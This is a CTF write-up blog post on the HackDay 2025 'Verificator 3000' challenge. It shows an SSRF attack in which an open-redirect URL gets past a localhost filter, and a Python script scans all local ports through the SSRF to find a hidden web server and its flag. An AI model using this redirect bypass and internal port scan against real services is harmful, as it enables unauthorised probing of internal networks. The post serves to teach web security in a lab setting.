<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" >
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="HackDay - Verificator 3000" />
<meta name="author" content="Anas" />
<meta property="og:locale" content="en" />
<meta name="description" content="Introduction Description" />
<meta property="og:description" content="Introduction Description" />
<link rel="canonical" href="https://github.com/NullBrunk/posts/hackday-2025-website-checker/" />
<meta property="og:url" content="https://github.com/NullBrunk/posts/hackday-2025-website-checker/" />
<meta property="og:site_name" content="NullBrunk" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-01-26T12:00:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HackDay - Verificator 3000" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Anas","url":"https://github.com/NullBrunk/"},"dateModified":"2025-02-09T18:25:45+00:00","datePublished":"2025-01-26T12:00:00+00:00","description":"Introduction Description","headline":"HackDay - Verificator 3000","mainEntityOfPage":{"@type":"WebPage","@id":"https://github.com/NullBrunk/posts/hackday-2025-website-checker/"},"url":"https://github.com/NullBrunk/posts/hackday-2025-website-checker/"}</script>
<!-- End Jekyll SEO tag -->


  <title>HackDay - Verificator 3000 | NullBrunk
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="NullBrunk">
<meta name="application-name" content="NullBrunk">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">


  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>







<script defer src="/assets/js/dist/post.min.js"></script>



<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/img/favicons/logo.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">NullBrunk</a>
    <p class="site-subtitle fst-italic mb-0">Web pentester, CTF player.</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
          
          <li class="nav-item">
            <a href="/ctfs/" class="nav-link">
              <i class="fa-fw fas fa-flag"></i>
              

              <span>CTFS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tools/" class="nav-link">
              <i class="fa-fw fas fas fa-code"></i>
              

              <span>TOOLS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/tags/" class="nav-link">
              <i class="fa-fw fas fa-tags"></i>
              

              <span>TAGS</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/resume/" class="nav-link">
              <i class="fa-fw fas fa-file"></i>
              

              <span>RESUME</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
          
          <li class="nav-item">
            <a href="/about/" class="nav-link">
              <i class="fa-fw fas fa-info-circle"></i>
              

              <span>ABOUT</span>
            </a>
          </li>
        
        <!-- .nav-item -->
      
        
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap justify-content-center align-items-center w-100">
    <a href="https://ctftime.org/user/157452" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fa-regular fa-font-awesome"></i>
    </a>

    <a href="https://www.root-me.org/NullBrunk" aria-label="rootme" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-skull"></i>
    </a>

    <a href="https://github.com/nullbrunk" aria-label="github" target="_blank" rel="noopener noreferrer">
      <i class="fab fa-github"></i>
    </a>

    <a href="https://tryhackme.com/p/nullbrunk" aria-label="tryhackme" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-cloud"></i>
    </a>

    <a href="mailto:anas.idiri.pro@gmail.com" aria-label="mail" target="_blank" rel="noopener noreferrer">
      <i class="fa-solid fa-envelope"></i>
    </a>
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!--  include topbar.html lang=lang -->

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11   col-xl-9  px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  




<!-- return -->










<header id="topbar-wrapper" aria-label="Top Bar">
    <div id="topbar" class="d-flex align-items-center justify-content-between h-100" >
        <nav id="breadcrumb" aria-label="Breadcrumb">
            <span><a href="/">Home</a></span>
             

            
                <span>
                 <a href="/categories/writeups/">Writeups</a>
                </span>
            
                <span>
                 <a href="/categories/ctftime2025/">CTFTime2025</a>
                </span>
            
                <span>
                 <a href="/categories/hackday/">HackDay</a>
                </span>
            

             
             
            

            
             
            
            <span>HackDay - Verificator 3000</span>
        </nav>
    </div>
</header>

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>HackDay - Verificator 3000</h1>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1737892800"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Jan 26, 2025
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1739125545"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Feb  9, 2025
</time>

        </span>
      

      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              
                <a href="https://github.com/NullBrunk/">Anas</a>
                
              
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="338 words"
>
  <em>1 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">HackDay - Verificator 3000</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">HackDay - Verificator 3000</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <ol>
  <li>Introduction
    <ul>
      <li><a href="#description">Description</a></li>
    </ul>
  </li>
  <li>Enumeration
    <ul>
      <li><a href="#enumerating-website">Enumerating website</a></li>
    </ul>
  </li>
  <li>Exploitation
    <ul>
      <li><a href="#ssrf">SSRF</a>
        <ul>
          <li><a href="#trying-to-access-localhost">Trying to access localhost</a></li>
          <li><a href="#exploiting-open-direct">Exploiting Open Direct</a></li>
          <li><a href="#port-scan">Port Scan</a></li>
        </ul>
      </li>
      <li><a href="#getting-flag">Getting the flag</a></li>
    </ul>
  </li>
</ol>

<hr />

<h1 id="introduction">Introduction</h1>

<h3 id="description"><span class="me-2">Description</span><a href="#description" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<blockquote>
  <p>Our team of brilliant engineers has developed a highly sophisticated website designed to perform check-ups on other sites. It can even uncover hidden information, possibly concealed by some clever tricksters. Take a look and see if you can find anything!</p>
</blockquote>

<h1 id="enumeration">Enumeration</h1>

<h3 id="enumerating-website"><span class="me-2">Enumerating website</span><a href="#enumerating-website" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p><a href="/assets/img/writeups/SuperWebsiteVerificator3000/example.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/SuperWebsiteVerificator3000/example.png" alt="image"  loading="lazy"></a>
<em>Index page</em></p>

<p>This webapp will request the website given by the user and display the content of this website. Seems to be the perfect setup for an <a href="https://portswigger.net/web-security/ssrf">SSRF</a>.</p>

<h1 id="exploit">Exploit</h1>

<h3 id="ssrf"><span class="me-2">SSRF</span><a href="#ssrf" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h4 id="trying-to-access-localhost"><span class="me-2">Trying to access localhost</span><a href="#trying-to-access-localhost" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>In an SSRF scenario, we almost always want to <strong>request localhost / machine from LAN</strong> to try to leak sensitive information. So let’s do that:
<a href="/assets/img/writeups/SuperWebsiteVerificator3000/localhost_fail.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/SuperWebsiteVerificator3000/localhost_fail.png" alt="image"  loading="lazy"></a>
<em>Sad …</em></p>

<p>Unfortunately we cannot direcly access <strong>localhost</strong> this way.</p>

<h4 id="exploiting-open-direct"><span class="me-2">Exploiting Open Direct</span><a href="#exploiting-open-direct" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>We can try to use an open redirect. Basically, we send a link that when accessed will <strong>redirect the victim to the chosen domain</strong>
For example this link:</p>
<ul>
  <li><a href="https://307.r3dir.me/--to/?url=http://localhost">https://307.r3dir.me/–to/?url=http://localhost</a></li>
</ul>

<p>will be considered valid for parsers <em>(cause the domain is <code class="language-plaintext highlighter-rouge">https://307.r3dir.me/</code>)</em>, but when accessed, will redirect the victim to <strong>localhost</strong>.</p>

<p><a href="/assets/img/writeups/SuperWebsiteVerificator3000/url_redirect_to_bypass.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/SuperWebsiteVerificator3000/url_redirect_to_bypass.png" alt="image"  loading="lazy"></a>
<em>Found open redirect !</em></p>

<h4 id="port-scan"><span class="me-2">Port scan</span><a href="#port-scan" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>

<p>Using open redirect + SSRF + my python skills I was able to write this simple portscan script. 
<br />It will look for accessible web servers on port 1 to 65535 of the local machine:</p>

<div file="port.py" class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="port.py"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td><td class="rouge-code"><pre><span class="kn">from</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">post</span>
<span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="n">log</span>

<span class="n">TARGET</span> <span class="o">=</span> <span class="sh">"</span><span class="s">http://challenges.hackday.fr:43244/api/check</span><span class="sh">"</span>
<span class="n">PAYLOAD</span> <span class="o">=</span> <span class="sh">"</span><span class="s">https://307.r3dir.me/--to/?url=http://localhost</span><span class="sh">"</span>

<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">progress</span> <span class="o">=</span> <span class="n">log</span><span class="p">.</span><span class="nf">progress</span><span class="p">(</span><span class="sh">"</span><span class="s">Testing port: </span><span class="sh">"</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">port</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">65535</span><span class="p">):</span>
        <span class="n">progress</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="nf">str</span><span class="p">(</span><span class="n">port</span><span class="p">))</span>

        <span class="n">response</span> <span class="o">=</span> <span class="nf">post</span><span class="p">(</span><span class="n">TARGET</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{</span>
            <span class="sh">"</span><span class="s">showBody</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">on</span><span class="sh">"</span><span class="p">,</span>
            <span class="sh">"</span><span class="s">url</span><span class="sh">"</span><span class="p">:</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">PAYLOAD</span><span class="si">}</span><span class="s">:</span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s">/</span><span class="sh">"</span>
        <span class="p">}).</span><span class="nf">json</span><span class="p">()</span>

        <span class="nf">if</span><span class="p">(</span><span class="ow">not</span> <span class="n">response</span><span class="p">[</span><span class="sh">"</span><span class="s">online</span><span class="sh">"</span><span class="p">]</span> <span class="o">==</span> <span class="bp">False</span><span class="p">):</span>
            <span class="n">log</span><span class="p">.</span><span class="nf">success</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Port </span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s"> is open</span><span class="sh">"</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="sh">"</span><span class="s">__main__</span><span class="sh">"</span><span class="p">:</span>
    <span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Targeting </span><span class="si">{</span><span class="n">TARGET</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="n">log</span><span class="p">.</span><span class="nf">info</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Using payload </span><span class="si">{</span><span class="n">PAYLOAD</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="nf">print</span><span class="p">()</span>
    <span class="nf">main</span><span class="p">()</span>

</pre></td></tr></tbody></table></code></div></div>

<p>Let’s launch it:
<a href="/assets/img/writeups/SuperWebsiteVerificator3000/port_600_opened.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/SuperWebsiteVerificator3000/port_600_opened.png" alt="image"  loading="lazy"></a>
<em>Found a webserver on an uncommon port !</em></p>

<h3 id="getting-flag"><span class="me-2">Getting flag</span><a href="#getting-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Let’s get the content of this webserver. We can use this link to do so:</p>
<ul>
  <li><a href="https://307.r3dir.me/--to/?url=http://localhost:600">https://307.r3dir.me/–to/?url=http://localhost:600</a></li>
</ul>

<p><a href="/assets/img/writeups/SuperWebsiteVerificator3000/port_600.png" class="popup img-link radius-shadow shimmer"><img src="/assets/img/writeups/SuperWebsiteVerificator3000/port_600.png" alt="image"  loading="lazy"></a></p>

<div file="flag.txt" class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="flag.txt"><i class="far fa-file-code fa-fw"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>HACKDAY{Give_ME_YOuR_L0OPb@CK}
</pre></td></tr></tbody></table></code></div></div>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/writeups/">Writeups</a>,
          <a href="/categories/ctftime2025/">CTFTime2025</a>,
          <a href="/categories/hackday/">HackDay</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/writeups/"
            class="post-tag no-text-decoration"
          >writeups</a>
        
          <a
            href="/tags/web/"
            class="post-tag no-text-decoration"
          >web</a>
        
          <a
            href="/tags/ssrf/"
            class="post-tag no-text-decoration"
          >ssrf</a>
        
          <a
            href="/tags/open-redirect/"
            class="post-tag no-text-decoration"
          >open-redirect</a>
        
          <a
            href="/tags/python-scripting/"
            class="post-tag no-text-decoration"
          >python-scripting</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=HackDay%20-%20Verificator%203000%20-%20NullBrunk&url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fhackday-2025-website-checker%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=HackDay%20-%20Verificator%203000%20-%20NullBrunk&u=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fhackday-2025-website-checker%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fgithub.com%2FNullBrunk%2Fposts%2Fhackday-2025-website-checker%2F&text=HackDay%20-%20Verificator%203000%20-%20NullBrunk" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

            
          </main>

         
            <!-- panel -->
            <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
              <div class="access">
                

  <section id="toc-wrapper">
    <h2 class="panel-heading no-border">Event</h2>
    <ul class="content list-unstyled no-border ps-0 pb-1 ms-1 mt-2 toc-list ">
    
      <li class="toc-list-item">
        <a class="toc-link node-name--H2 img-link fw-600 blue-sidebar"> <i class="fa-solid fa-ranking-star mr-11-px"></i> 40 / 150  </a>
      </li>

      <li class="toc-list-item no-border">
        <a class="toc-link node-name--H2 img-link fw-600" href="https://ctftime.org/event/2615" target="_blank"> <i class="fa-solid fa-link mr-11-px"></i>Link</a>
      </li>

    </ul>
  </section>





                

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/writeups/">writeups</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/web/">web</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/ssrf/">ssrf</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/open-redirect/">open-redirect</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/python-scripting/">python-scripting</a>
          
        </div>
      </nav>
  </section>


              </div>

              
                
                






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-1 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

              
            </aside>
          
        </div>

        <div class="row">
          <!-- tail -->

          
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/hackday-2025-finest/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1737806400"
  data-df="ll"
  
>
  Jan 25, 2025
</time>

              <h4 class="pt-0 my-2">HackDay - Finest</h4>
              <div class="text-muted">
                <p>Introduction
    
      Description
    
  
  Enumeration
    
      Reading Source Code
      JWY Secret Key
      SQL injection
    
  
  Exploitation
    
      Understanding the JWT
      Scrip...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/hackday-2025-internalblog/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1737892800"
  data-df="ll"
  
>
  Jan 26, 2025
</time>

              <h4 class="pt-0 my-2">HackDay - Internal Blog</h4>
              <div class="text-muted">
                <p>Introduction
    
      Description
    
  
  Enumeration
    
      Enumerating website
    
  
  Exploitation
    
      Popping alert
      Stealing Admin Cookie
      Getting flag
    
  




I...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/SrdnlenCTF2025-racecondition-copy/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1737216000"
  data-df="ll"
  
>
  Jan 18, 2025
</time>

              <h4 class="pt-0 my-2">Srdnlen - Speed</h4>
              <div class="text-muted">
                <p>Enumeration
    
      Reading source code
      Interesting points
      Identifying vulnerabilities
    
  
  Exploitation
    
      Exploiting the vulnerability
      Scripting
      Getting th...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      

  <section>
      <h2 class="panel-heading no-border">Tags</h2>

      <nav id="toc">
        <div class="d-flex flex-wrap mt-3 mb-1 me-3">
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/hacking-tools/">hacking-tools</a>
          
            
            <a class="post-tag btn btn-outline-primary" href="/tags/poc/">poc</a>
          
        </div>
      </nav>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
